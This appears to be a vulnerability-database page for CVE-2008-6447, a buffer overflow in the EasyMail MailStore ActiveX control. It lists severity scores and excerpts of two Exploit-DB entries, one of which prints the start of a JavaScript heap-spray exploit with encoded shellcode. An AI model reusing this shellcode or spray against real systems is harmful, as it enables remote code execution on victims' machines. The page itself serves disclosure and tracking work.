CVE-2008-6447
published 2009-03-09CVE-2008-6447: Buffer overflow in emmailstore.dll 6.5.0.3 in the QuikSoft EasyMail MailStore ActiveX control allows remote attackers to execute arbitrary code via a long…
PriorityP346critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
5.82%
92.2th percentile
Buffer overflow in emmailstore.dll 6.5.0.3 in the QuikSoft EasyMail MailStore ActiveX control allows remote attackers to execute arbitrary code via a long first argument to the CreateStore method.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| quiksoft | easymail_mailstore_object | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
EasyMail Quicksoft 6.0.2.0 - CreateStore ActiveX Code Execution (PoC)
exploitdb·2009-09-15
CVE-2008-6447 EasyMail Quicksoft 6.0.2.0 - CreateStore ActiveX Code Execution (PoC)
EasyMail Quicksoft 6.0.2.0 - CreateStore ActiveX Code Execution (PoC)
---
#####################################################################################
Application: EasyMail Quicksoft 6.0.2.0
Platforms: Windows XP Professional French SP2
crash: IE 6.0.2900.2180
Exploitation: remote Code Execution
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
#####################################################################################
1) Introduction
2) Technical details and bug
3) The Code
#####################################################################################
1) Introduction
Create, send, download, parse, print and store internet email messages in your classic windows application. Designed for Visual Basic, ASP, C++, Delphi, ColdFusion, P
Exploit-DB
EasyMail - ActiveX 'emmailstore.dll 6.5.0.3' Remote Buffer Overflow
exploitdb·2008-12-09
CVE-2008-6447 EasyMail - ActiveX 'emmailstore.dll 6.5.0.3' Remote Buffer Overflow
EasyMail - ActiveX 'emmailstore.dll 6.5.0.3' Remote Buffer Overflow
---
################ EasyMail ActiveX Heap Spray Exploit ############
By: e.wiZz! & shinnai
Site: infected.blogger.ba & shinnai.net
#######Info: #########################################
CompanyName Quiksoft Corporation
FileDescription EasyMail MailStore Object
FileVersion 6, 5, 0, 3
Vulnerable file emmailstore.dll
var sCode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u504
No writeups or analysis indexed.
2009-03-09
Published